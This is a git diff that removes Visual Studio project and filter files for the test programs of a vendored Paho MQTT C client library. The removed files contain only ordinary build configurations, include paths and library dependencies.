-<Project DefaultTargets="Build" ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
-  <ItemGroup Label="ProjectConfigurations">
-    <ProjectConfiguration Include="Debug|Win32">
-      <Configuration>Debug</Configuration>
-      <Platform>Win32</Platform>
-    </ProjectConfiguration>
-    <ProjectConfiguration Include="Debug|x64">
-      <Configuration>Debug</Configuration>
-      <Platform>x64</Platform>
-    </ProjectConfiguration>
-    <ProjectConfiguration Include="Release|Win32">
-      <Configuration>Release</Configuration>
-      <Platform>Win32</Platform>
-    </ProjectConfiguration>
-    <ProjectConfiguration Include="Release|x64">
-      <Configuration>Release</Configuration>
-      <Platform>x64</Platform>
-    </ProjectConfiguration>
-  </ItemGroup>
-  <PropertyGroup Label="Globals">
-    <ProjectGuid>{A4E14611-05DC-40A1-815B-DA30CA167C9B}</ProjectGuid>
-    <Keyword>Win32Proj</Keyword>
-    <RootNamespace>test2</RootNamespace>
-    <WindowsTargetPlatformVersion>10.0.14393.0</WindowsTargetPlatformVersion>
-  </PropertyGroup>
-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
-    <ConfigurationType>Application</ConfigurationType>
-    <UseDebugLibraries>true</UseDebugLibraries>
-    <PlatformToolset>v141</PlatformToolset>
-    <CharacterSet>Unicode</CharacterSet>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
-    <ConfigurationType>Application</ConfigurationType>
-    <UseDebugLibraries>true</UseDebugLibraries>
-    <PlatformToolset>v141</PlatformToolset>
-    <CharacterSet>Unicode</CharacterSet>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
-    <ConfigurationType>Application</ConfigurationType>
-    <UseDebugLibraries>false</UseDebugLibraries>
-    <PlatformToolset>v141</PlatformToolset>
-    <WholeProgramOptimization>true</WholeProgramOptimization>
-    <CharacterSet>Unicode</CharacterSet>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
-    <ConfigurationType>Application</ConfigurationType>
-    <UseDebugLibraries>false</UseDebugLibraries>
-    <PlatformToolset>v141</PlatformToolset>
-    <WholeProgramOptimization>true</WholeProgramOptimization>
-    <CharacterSet>Unicode</CharacterSet>
-  </PropertyGroup>
-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
-  <ImportGroup Label="ExtensionSettings">
-  </ImportGroup>
-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <PropertyGroup Label="UserMacros" />
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
-    <LinkIncremental>true</LinkIncremental>
-    <OutDir>$(SolutionDir)..\build\output\test\</OutDir>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
-    <LinkIncremental>true</LinkIncremental>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
-    <LinkIncremental>false</LinkIncremental>
-    <OutDir>$(SolutionDir)..\build\output\test\</OutDir>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
-    <LinkIncremental>false</LinkIncremental>
-  </PropertyGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
-    <ClCompile>
-      <PrecompiledHeader>NotUsing</PrecompiledHeader>
-      <WarningLevel>Level3</WarningLevel>
-      <Optimization>Disabled</Optimization>
-      <PreprocessorDefinitions>WIN32_LEAN_AND_MEAN;_WINDOWS;WIN32;_DEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <SDLCheck>true</SDLCheck>
-      <AdditionalIncludeDirectories>$(SolutionDir)\..\src</AdditionalIncludeDirectories>
-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>
-    </ClCompile>
-    <Link>
-      <SubSystem>Console</SubSystem>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
-      <AdditionalLibraryDirectories>$(SolutionDir)..\build\output\;%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
-      <AdditionalDependencies>ws2_32.lib;paho-mqtt3c.lib;%(AdditionalDependencies)</AdditionalDependencies>
-    </Link>
-  </ItemDefinitionGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
-    <ClCompile>
-      <PrecompiledHeader>NotUsing</PrecompiledHeader>
-      <WarningLevel>Level3</WarningLevel>
-      <Optimization>Disabled</Optimization>
-      <PreprocessorDefinitions>WIN32_LEAN_AND_MEAN;_WINDOWS;WIN32;_DEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <SDLCheck>true</SDLCheck>
-      <AdditionalIncludeDirectories>$(SolutionDir)\..\src</AdditionalIncludeDirectories>
-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>
-    </ClCompile>
-    <Link>
-      <SubSystem>Console</SubSystem>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
-      <AdditionalLibraryDirectories>$(SolutionDir)\x64\$(Configuration);%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
-      <AdditionalDependencies>ws2_32.lib;paho-mqtt3c.lib;%(AdditionalDependencies)</AdditionalDependencies>
-    </Link>
-  </ItemDefinitionGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
-    <ClCompile>
-      <WarningLevel>Level3</WarningLevel>
-      <PrecompiledHeader>NotUsing</PrecompiledHeader>
-      <Optimization>MaxSpeed</Optimization>
-      <FunctionLevelLinking>true</FunctionLevelLinking>
-      <IntrinsicFunctions>true</IntrinsicFunctions>
-      <PreprocessorDefinitions>WIN32_LEAN_AND_MEAN;_WINDOWS;WIN32;NDEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <SDLCheck>true</SDLCheck>
-      <AdditionalIncludeDirectories>$(SolutionDir)\..\src</AdditionalIncludeDirectories>
-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>
-    </ClCompile>
-    <Link>
-      <SubSystem>Console</SubSystem>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
-      <EnableCOMDATFolding>true</EnableCOMDATFolding>
-      <OptimizeReferences>true</OptimizeReferences>
-      <AdditionalLibraryDirectories>$(SolutionDir)..\build\output\;%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
-      <AdditionalDependencies>ws2_32.lib;paho-mqtt3c.lib;%(AdditionalDependencies)</AdditionalDependencies>
-    </Link>
-  </ItemDefinitionGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
-    <ClCompile>
-      <WarningLevel>Level3</WarningLevel>
-      <PrecompiledHeader>NotUsing</PrecompiledHeader>
-      <Optimization>MaxSpeed</Optimization>
-      <FunctionLevelLinking>true</FunctionLevelLinking>
-      <IntrinsicFunctions>true</IntrinsicFunctions>
-      <PreprocessorDefinitions>WIN32_LEAN_AND_MEAN;_WINDOWS;WIN32;NDEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <SDLCheck>true</SDLCheck>
-      <AdditionalIncludeDirectories>$(SolutionDir)\..\src</AdditionalIncludeDirectories>
-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>
-    </ClCompile>
-    <Link>
-      <SubSystem>Console</SubSystem>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
-      <EnableCOMDATFolding>true</EnableCOMDATFolding>
-      <OptimizeReferences>true</OptimizeReferences>
-      <AdditionalLibraryDirectories>$(SolutionDir)\x64\$(Configuration);%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
-      <AdditionalDependencies>ws2_32.lib;paho-mqtt3c.lib;%(AdditionalDependencies)</AdditionalDependencies>
-    </Link>
-  </ItemDefinitionGroup>
-  <ItemGroup>
-    <Text Include="ReadMe.txt" />
-  </ItemGroup>
-  <ItemGroup>
-    <ClCompile Include="..\..\src\Log.c" />
-    <ClCompile Include="..\..\src\Messages.c" />
-    <ClCompile Include="..\..\src\StackTrace.c" />
-    <ClCompile Include="..\..\src\Thread.c" />
-    <ClCompile Include="..\..\test\test2.c" />
-  </ItemGroup>
-  <ItemGroup>
-    <ClInclude Include="..\..\src\MQTTAsync.h" />
-    <ClInclude Include="..\..\src\MQTTClientPersistence.h" />
-  </ItemGroup>
-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
-  <ImportGroup Label="ExtensionTargets">
-  </ImportGroup>
-</Project>
\ No newline at end of file
diff --git a/thirdparty/paho.mqtt.c/Windows Build/test2/test2.vcxproj.filters b/thirdparty/paho.mqtt.c/Windows Build/test2/test2.vcxproj.filters
deleted file mode 100644
index 79e09c4..0000000
--- a/thirdparty/paho.mqtt.c/Windows Build/test2/test2.vcxproj.filters
+++ /dev/null
@@ -1,45 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
-  <ItemGroup>
-    <Filter Include="Source Files">
-      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
-      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
-    </Filter>
-    <Filter Include="Header Files">
-      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
-      <Extensions>h;hh;hpp;hxx;hm;inl;inc;xsd</Extensions>
-    </Filter>
-    <Filter Include="Resource Files">
-      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
-      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
-    </Filter>
-  </ItemGroup>
-  <ItemGroup>
-    <Text Include="ReadMe.txt" />
-  </ItemGroup>
-  <ItemGroup>
-    <ClCompile Include="..\..\test\test2.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\Thread.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\StackTrace.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\Log.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-    <ClCompile Include="..\..\src\Messages.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-  </ItemGroup>
-  <ItemGroup>
-    <ClInclude Include="..\..\src\MQTTAsync.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\MQTTClientPersistence.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-  </ItemGroup>
-</Project>
\ No newline at end of file
diff --git a/thirdparty/paho.mqtt.c/Windows Build/test3/test3.vcxproj b/thirdparty/paho.mqtt.c/Windows Build/test3/test3.vcxproj
deleted file mode 100755
index 8c94f73..0000000
--- a/thirdparty/paho.mqtt.c/Windows Build/test3/test3.vcxproj
+++ /dev/null
@@ -1,178 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>

-<Project DefaultTargets="Build" ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">

-  <ItemGroup Label="ProjectConfigurations">

-    <ProjectConfiguration Include="Debug|Win32">

-      <Configuration>Debug</Configuration>

-      <Platform>Win32</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Debug|x64">

-      <Configuration>Debug</Configuration>

-      <Platform>x64</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Release|Win32">

-      <Configuration>Release</Configuration>

-      <Platform>Win32</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Release|x64">

-      <Configuration>Release</Configuration>

-      <Platform>x64</Platform>

-    </ProjectConfiguration>

-  </ItemGroup>

-  <PropertyGroup Label="Globals">

-    <ProjectGuid>{0CBDD939-F0C9-4887-8C7E-9E645C34FF94}</ProjectGuid>

-    <Keyword>Win32Proj</Keyword>

-    <RootNamespace>test1</RootNamespace>

-    <WindowsTargetPlatformVersion>10.0.14393.0</WindowsTargetPlatformVersion>

-  </PropertyGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>true</UseDebugLibraries>

-    <PlatformToolset>v141</PlatformToolset>

-    <CharacterSet>Unicode</CharacterSet>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>true</UseDebugLibraries>

-    <PlatformToolset>v141</PlatformToolset>

-    <CharacterSet>Unicode</CharacterSet>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>false</UseDebugLibraries>

-    <PlatformToolset>v141</PlatformToolset>

-    <WholeProgramOptimization>true</WholeProgramOptimization>

-    <CharacterSet>Unicode</CharacterSet>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>false</UseDebugLibraries>

-    <PlatformToolset>v141</PlatformToolset>

-    <WholeProgramOptimization>true</WholeProgramOptimization>

-    <CharacterSet>Unicode</CharacterSet>

-  </PropertyGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />

-  <ImportGroup Label="ExtensionSettings">

-  </ImportGroup>

-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <PropertyGroup Label="UserMacros" />

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <LinkIncremental>true</LinkIncremental>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">

-    <LinkIncremental>true</LinkIncremental>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <LinkIncremental>false</LinkIncremental>

-    <OutDir>$(SolutionDir)..\build\output\test\</OutDir>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">

-    <LinkIncremental>false</LinkIncremental>

-  </PropertyGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <ClCompile>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <WarningLevel>Level3</WarningLevel>

-      <Optimization>Disabled</Optimization>

-      <PreprocessorDefinitions>_WINDOWS;WIN32;_DEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <SDLCheck>true</SDLCheck>

-      <AdditionalIncludeDirectories>$(SolutionDir)\..\src;$(OpenSSLDir)\include</AdditionalIncludeDirectories>

-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>

-    </ClCompile>

-    <Link>

-      <SubSystem>Console</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-      <AdditionalLibraryDirectories>$(SolutionDir)..\build\output\;%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>

-      <AdditionalDependencies>ws2_32.lib;paho-mqtt3cs.lib;%(AdditionalDependencies)</AdditionalDependencies>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">

-    <ClCompile>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <WarningLevel>Level3</WarningLevel>

-      <Optimization>Disabled</Optimization>

-      <PreprocessorDefinitions>_WINDOWS;WIN32;_DEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <SDLCheck>true</SDLCheck>

-      <AdditionalIncludeDirectories>$(SolutionDir)\..\src;$(OpenSSLDir)\include</AdditionalIncludeDirectories>

-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>

-    </ClCompile>

-    <Link>

-      <SubSystem>Console</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-      <AdditionalLibraryDirectories>$(SolutionDir)\x64\$(Configuration)</AdditionalLibraryDirectories>

-      <AdditionalDependencies>ws2_32.lib;paho-mqtt3cs.lib;%(AdditionalDependencies)</AdditionalDependencies>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <ClCompile>

-      <WarningLevel>Level3</WarningLevel>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <Optimization>MaxSpeed</Optimization>

-      <FunctionLevelLinking>true</FunctionLevelLinking>

-      <IntrinsicFunctions>true</IntrinsicFunctions>

-      <PreprocessorDefinitions>_WINDOWS;WIN32;NDEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <SDLCheck>true</SDLCheck>

-      <AdditionalIncludeDirectories>$(SolutionDir)\..\src;$(OpenSSLDir)\include</AdditionalIncludeDirectories>

-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>

-    </ClCompile>

-    <Link>

-      <SubSystem>Console</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-      <EnableCOMDATFolding>true</EnableCOMDATFolding>

-      <OptimizeReferences>true</OptimizeReferences>

-      <AdditionalLibraryDirectories>$(SolutionDir)..\build\output\;%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>

-      <AdditionalDependencies>ws2_32.lib;paho-mqtt3cs.lib;%(AdditionalDependencies)</AdditionalDependencies>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">

-    <ClCompile>

-      <WarningLevel>Level3</WarningLevel>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <Optimization>MaxSpeed</Optimization>

-      <FunctionLevelLinking>true</FunctionLevelLinking>

-      <IntrinsicFunctions>true</IntrinsicFunctions>

-      <PreprocessorDefinitions>_WINDOWS;WIN32;NDEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <SDLCheck>true</SDLCheck>

-      <AdditionalIncludeDirectories>$(SolutionDir)\..\src;$(OpenSSLDir)\include</AdditionalIncludeDirectories>

-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>

-    </ClCompile>

-    <Link>

-      <SubSystem>Console</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-      <EnableCOMDATFolding>true</EnableCOMDATFolding>

-      <OptimizeReferences>true</OptimizeReferences>

-      <AdditionalLibraryDirectories>$(SolutionDir)\x64\$(Configuration)</AdditionalLibraryDirectories>

-      <AdditionalDependencies>ws2_32.lib;paho-mqtt3cs.lib;%(AdditionalDependencies)</AdditionalDependencies>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemGroup>

-    <ClInclude Include="..\..\src\MQTTClient.h" />

-    <ClInclude Include="..\..\src\MQTTClientPersistence.h" />

-  </ItemGroup>

-  <ItemGroup>

-    <ClCompile Include="..\..\test\test3.c" />

-  </ItemGroup>

-  <ItemGroup>

-    <ProjectReference Include="..\paho-mqtt3cs\paho-mqtt3cs.vcxproj">

-      <Project>{17f07f98-aa5f-4373-9877-992a341d650a}</Project>

-    </ProjectReference>

-  </ItemGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />

-  <ImportGroup Label="ExtensionTargets">

-  </ImportGroup>

-</Project>
\ No newline at end of file
diff --git a/thirdparty/paho.mqtt.c/Windows Build/test3/test3.vcxproj.filters b/thirdparty/paho.mqtt.c/Windows Build/test3/test3.vcxproj.filters
deleted file mode 100644
index a63cda7..0000000
--- a/thirdparty/paho.mqtt.c/Windows Build/test3/test3.vcxproj.filters
+++ /dev/null
@@ -1,30 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
-  <ItemGroup>
-    <Filter Include="Source Files">
-      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
-      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
-    </Filter>
-    <Filter Include="Header Files">
-      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
-      <Extensions>h;hh;hpp;hxx;hm;inl;inc;xsd</Extensions>
-    </Filter>
-    <Filter Include="Resource Files">
-      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
-      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
-    </Filter>
-  </ItemGroup>
-  <ItemGroup>
-    <ClInclude Include="..\..\src\MQTTClient.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-    <ClInclude Include="..\..\src\MQTTClientPersistence.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
-  </ItemGroup>
-  <ItemGroup>
-    <ClCompile Include="..\..\test\test3.c">
-      <Filter>Source Files</Filter>
-    </ClCompile>
-  </ItemGroup>
-</Project>
\ No newline at end of file
diff --git a/thirdparty/paho.mqtt.c/Windows Build/test4/test4.vcxproj b/thirdparty/paho.mqtt.c/Windows Build/test4/test4.vcxproj
deleted file mode 100755
index 31815bb..0000000
--- a/thirdparty/paho.mqtt.c/Windows Build/test4/test4.vcxproj
+++ /dev/null
@@ -1,173 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>

-<Project DefaultTargets="Build" ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">

-  <ItemGroup Label="ProjectConfigurations">

-    <ProjectConfiguration Include="Debug|Win32">

-      <Configuration>Debug</Configuration>

-      <Platform>Win32</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Debug|x64">

-      <Configuration>Debug</Configuration>

-      <Platform>x64</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Release|Win32">

-      <Configuration>Release</Configuration>

-      <Platform>Win32</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Release|x64">

-      <Configuration>Release</Configuration>

-      <Platform>x64</Platform>

-    </ProjectConfiguration>

-  </ItemGroup>

-  <PropertyGroup Label="Globals">

-    <ProjectGuid>{29D6A4E9-5A39-4CD3-8A24-348A34832405}</ProjectGuid>

-    <Keyword>Win32Proj</Keyword>

-    <RootNamespace>test1</RootNamespace>

-    <WindowsTargetPlatformVersion>10.0.14393.0</WindowsTargetPlatformVersion>

-  </PropertyGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>true</UseDebugLibraries>

-    <PlatformToolset>v141</PlatformToolset>

-    <CharacterSet>Unicode</CharacterSet>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>true</UseDebugLibraries>

-    <PlatformToolset>v141</PlatformToolset>

-    <CharacterSet>Unicode</CharacterSet>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>false</UseDebugLibraries>

-    <PlatformToolset>v141</PlatformToolset>

-    <WholeProgramOptimization>true</WholeProgramOptimization>

-    <CharacterSet>Unicode</CharacterSet>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>false</UseDebugLibraries>

-    <PlatformToolset>v141</PlatformToolset>

-    <WholeProgramOptimization>true</WholeProgramOptimization>

-    <CharacterSet>Unicode</CharacterSet>

-  </PropertyGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />

-  <ImportGroup Label="ExtensionSettings">

-  </ImportGroup>

-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <PropertyGroup Label="UserMacros" />

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <LinkIncremental>true</LinkIncremental>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">

-    <LinkIncremental>true</LinkIncremental>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <LinkIncremental>false</LinkIncremental>

-    <OutDir>$(SolutionDir)..\build\output\test\</OutDir>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">

-    <LinkIncremental>false</LinkIncremental>

-  </PropertyGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <ClCompile>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <WarningLevel>Level3</WarningLevel>

-      <Optimization>Disabled</Optimization>

-      <PreprocessorDefinitions>_WINDOWS;WIN32;_DEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <SDLCheck>true</SDLCheck>

-      <AdditionalIncludeDirectories>$(SolutionDir)\..\src</AdditionalIncludeDirectories>

-      <DisableSpecificWarnings>4996</DisableSpecificWarnings>

-    </ClCompile>

-    <Link>

-      <SubSystem>Console</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

